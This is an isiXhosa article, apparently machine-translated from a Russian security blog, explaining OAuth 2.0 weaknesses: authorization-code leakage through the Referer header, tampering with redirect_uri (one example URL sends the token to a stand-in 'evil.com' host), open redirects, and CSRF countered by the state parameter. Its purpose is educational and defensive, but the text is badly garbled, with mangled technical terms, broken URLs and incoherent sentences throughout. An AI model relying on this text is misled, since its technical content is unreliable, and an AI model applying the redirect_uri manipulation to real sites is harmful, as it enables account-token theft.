Eli nqaku liza kujongana ne-oallneraccedges eyaziwayo. Abafundi baya kufunda indlela yokuphumeza ugunyaziso olukhuselekileyo nolukhuselekileyo kwisicelo sewebhu.
I-OAUTH YENKQUBO YOKUGQIBELA, kodwa inqanaba lokhuseleko laso lixhomekeke kulwaziso lwabaphuhlisi beWebhu xa kumiliselwa ugunyaziso. Oku kwenza ukuba esi sihloko sibaluleke kakhulu kwiingcali zoKhuseleko loLwazi. Kufuneka babonelele kwinqanaba eliphezulu lokukhuselwa kweeakhawunti zabasebenzisi babo. Lixesha lokuba uqhelene neengcali ezifanelekileyo eziza kunceda ukunciphisa ingozi yokuthengisa i-oute.
IntshayeleloI-OAuth 2.0 Iprotocol ngoku isetyenziswa ngokubanzi kwizicelo ezahlukeneyo. Ukuyisebenzisa, ujongano lwabasebenzisi olusebenzayo luyafumaneka, ukuqinisekiswa okulula kunye nogunyaziso xa kuthelekiswa neendlela zemveli zokungenisa igama lomsebenzisi kunye negama lokugqitha. Ukumiliselwa okufanelekileyo nokucinga, umgaqo-nkqubo we-OAuth uya kukukhusela ugunyaziso ngokwesiko, kuba abasebenzisi akufuneki babelane ngedatha yabo ye-Accounting ngesicelo esithile sokufikelela kwisicelo esithile. Abasebenzisi bahlala bethanda ukungena kwiakhawunti zabo zikaGoogle, i-Facebook okanye i-LinkedIn, endaweni yokudala iakhawunti entsha ngalo lonke ixesha kufuneka ubhalise kwiwebhusayithi yeWebhu. Ngenxa yoko, umgaqo-nkqubo we-OAuth owenza kakuhle ubomi bethu.
Ngokubanzi, ababoneleli beenkonzo zeOauth odumileyo bathembekile kakhulu. Ngena ngeGoogle okanye i-akhawunti ye-facebook ikhuthaza imeko yokhuseleko, kwaye ichanekile. Iprotocol ivavanywa ngononophelo ziingcali. Zonke izinto ezikhoyo ezikhoyo zihlala zilungiswa ngokukhawuleza liqela le-verity. Nangona kunjalo, kufanelekile ukuba uqaphele ukuba imvakalelo yokhuseleko olupheleleyo inokuba bubuxoki.
Ababoneleli beenkonzo ze-OATHE Thivelela abaphuhlisi baphuhlisile izizathu ezininzi zokuvumela ukhuseleko lweenkqubo zabo. Ngapha koko, inkonzo yokuqala ye-OUTH, iphunyezwe ngokungachanekanga kwinkqubo yokufakwa kwayo, inokuba yithagethi elula kubangeneleli. Ezo zinto ziphambili ziya kukhokelela kubusela bedatha yabasebenzisi.
Okulandelayo, kuya kufuneka uqwalasele ezona zinto zihlelelekileyo zijamelene nezicelo zomntu wesithathu ezisebenzisa i-OAuth Protocol yokugunyazisa abasebenzisi babo. Makukhunjulwe ukuba umgaqo-nkqubo ngokwawo ukhuselekile kwaye uthembekile. Kuphela kusemva kokuphunyezwa okungachanekanga, kuya kuba sengozini yokuhlaselwa kwe-hacker.
I-Oauth tockey Freft esebenzisa i-headrensi ye-referXa isicelo sicela ukuba sinikwe umsebenzisi kwi-OAuth Server, umntu ufumana ikhowudi ukuba angenise kwaye athumele umva kwi-server yesheshi yayo elandelayo. Ukuba ngexesha lomsebenzi Umsebenzisi uya kuthunyelwa kwelinye iphepha, ikhowudi iya kubonakala kwi-"Referensi" yentloko yesicelo se-HTTP. Ke, le khowudi iya kuwa kwiwebhusayithi yangaphandle, eya koyikisa idatha yomsebenzisi ebhaliswe kwiseva ye-OATH.
Qaphela: Intloko ye-Referensi ye-Referensi yiNtloko ye-HTTP ye-HTTP, idlulisela umamkeli we-URL apho isicelo sithunyelwe khona isicelo.
Ukuthambisa iziphumo zaba semngciphekweni, umphuhlisi kufuneka aqiniseke ukuba isicelo sayo asinayo nayiphi na inaliti ye-HTML. Ukuba inaliti ifunyenwe, umhlaseli unokuseta ngokulula ithegi yomfanekiso kwiseva yewebhu kwaye ufumane indlela yokuhambisa umsebenzisi kuyo. Ke, uya kufumana ithuba lokuyiba ikhowudi ukusuka kwi-"mfure "yesicelo se-HTTP.
I-Oauth Tockey Aft Shere isebenzisa i-Revereirect_ure parameterIsicelo siqala inkqubo yogunyaziso ngokuthumela isicelo kwi-OAEE Server:
https: //www.example.com/sigrin/autriize? I-Wecromb.edemo.example.com/loginuple.
Umbuzo uhlala une "Refleirect_uri" esetyenziswe yi-OAuth Server ukuba ithumele ithokheni emva kwesicelo emva komsebenzisi wanika imvume yakhe. Ukuba ixabiso lale paramitha alilawulwa okanye aliyi kutshekishwa ngokulula kwaye liyitshintshe ngokulula kwaye libuyisele isicelo kwiwebhusayithi yayo, apho isebenzisa inkqubo ekhethekileyo yokuqhubela phambili ithokheni kwaye ifumane ukufikelela kwisixhobo esilinganiselweyo.
https: //www.example.com/sigrin/autriize? I-Wecromb.. -edmirect_irirhost.evil.com.
Ngamanye amaxesha ii-URLs ezifanayo zivaliwe. Umhlaseli unokuhambisa idatha efunyenweyo kwi-URL evulekileyo, ngolu hlobo:
I-https //www.iempleple.com/oauth20_autrize.imba.
Okanye:
I-https: //www.eamiple.com/outh2/auterize?
Xa usenza i-Oauth, awunakuze ubandakanye yonke imimandla kuluhlu lwabamhlophe. Kuphela zii-URL ezimbalwa kuphela kufuneka zongezwe ku "Refreirect_uri" ayifihli isicelo sokuvula iRed Refrect.
I-Forgery yeZicelo zomgcaI-Forgery yesicelo esahlukileyo isenokwenzeka xa umhlaseli ephumelele ekwenzeni ixhoba ukuba licofe kwikhonkco lakhe kwaye, ngaloo ndlela, ukuvelisa isicelo sokuba wayengayi kuvelisa. I-Forgery yezicelo zomgca omnqamlezo ihlala ithathwe ngethokheni ye-CSRF, ehambelana neseshoni yomsebenzisi. Inceda isicelo ukukhangela umntu othumele isicelo. Ipharamitha "yombuso" kwi-Oauth Procol isebenza njengethokheni ye-CSRF.
Kufanelekile ukujonga ukuba uhlaselo lwe-CSRF lwenziwa njani kwi-oute kunye neparamitha "yelizwe" inokusetyenziselwa ukunciphisa iziphumo zobungozi.
I-Hacker ivula isicelo sewebhu kwaye idlulise inkqubo yokugunyazisa ukufikelela kumboneleli ngenkonzo isebenzisa i-OEuth. Isicelo sicela umboneleli-nkonzo ukuba afumane ukuba kufuneka kubonelelwe. I-Hacker iya kuthunyelwa kwiwebhusayithi yomboneleli-nkonzo, apho uhlala khona ukufaka igama lomsebenzisi kunye negama lokugqitha ukugunyazisa ukufikelela. Endaweni yoko, i-hacker ibambisa kwaye ithintela esi sicelo kwaye isindisa i-URL yayo. I-Hacker ngandlela ithile ibangela ixhoba ukuba ivule le URL. Ukuba ixhoba lingenise inkqubo yomboneleli kwinkonzo isebenzisa iakhawunti yayo, emva koko iziqinisekiso zayo ziya kusetyenziselwa ukukhupha ikhowudi yokugunyazisa. Ikhowudi yokugunyazisa itshintshiselana kwithokheni yokufikelela. Ngoku i-akhawunti ye-HACKER kwisicelo igunyazisiwe. Inokufikelela kwiakhawunti yexhoba.
Ke, ndingayithintela njani le meko isebenzisa iparameter "yombuso"?
Isicelo kufuneka senze ixabiso elisekwe kwiakhawunti ye-akhawunti (umzekelo, sebenzisa isitshixo seseshoni yomsebenzisi). Ayibalulekanga kangako ukuba yiyo, eyona nto iphambili kukuba ixabiso lahlukile kwaye livelisiwe kusetyenziswa ulwazi lwangasese malunga nomsebenzisi wantlandlolo. Yabelwa iparameter "yoRhulumente".
Eli xabiso lidluliselwa kumboneleli ngenkonzo xa iphinda isebenze kwakhona. Ngoku i-hacker imema ixhoba ukuba ivule i-URL, awayigcinayo.
Ikhowudi yokugunyazisa ikhutshwe kwaye ithunyelwe kumthengi kwiseshoni kunye ne "State" parameter.
Umxhasi uvelisa ixabiso leparamitha ngokusekwe kwingcaciso yeseshoni kwaye ithelekise ixabiso "likarhulumente", elalithunyelwa kwiSicelo sokuGunyazisa kugunyaziso. Eli xabiso alihambelani ne "State" kwi-parameter "yombuso" kumbuzo, kuba ivelisiwe kuphela kwisiseko solwazi malunga neseshoni yangoku. Ngenxa yoko, ixabiso elifunyenweyo alimkelwa yinkqubo.
EZINYE IXESHA LOKUXELWA XA KUKHETHA I-OEUTH YOKUFUNDA I-XSS (i-Cross-Cross-Sprichect_ingu-Premect_isithi ngamanye amaxesha, i-OAuth AMAXESHA AKUFUNDIWEYO Ikhowudi yokuGunyazisa inokusetyenziswa ngaphezulu kwesinye ukuba ikhuphe ithokheni ezininzi. Ezi zinto zisemngciphekweni zingaqhelekanga kunezo zichazwe apha ngasentla, kodwa azibenzi ukuba zibe yingozi. Umphuhlisi kufuneka azi zonke iinkqubo eziyimfuneko ukuqinisekisa ukusebenza okuthembekileyo kwesicelo sayo sewebhu.
Umbhali wenqaku eliguqulelwayo: USimon Salbali.
Kubalulekile! Ulwazi ngokukodwa ngenxa yeenjongo zemfundo. Nceda uhambelane nomthetho kwaye ungasebenzisi olu lwazi ngeenjongo ezingekho mthethweni.
Inqaku elinomdla ngakumbi kwiCisoclub.ru. Bhalisela kuthi: I-facebook | VK | I-Twitter | I-Instagram | I-Telegraph | I-Zen | Messeser | ICQ ENTS | I-YouTube | Pulse.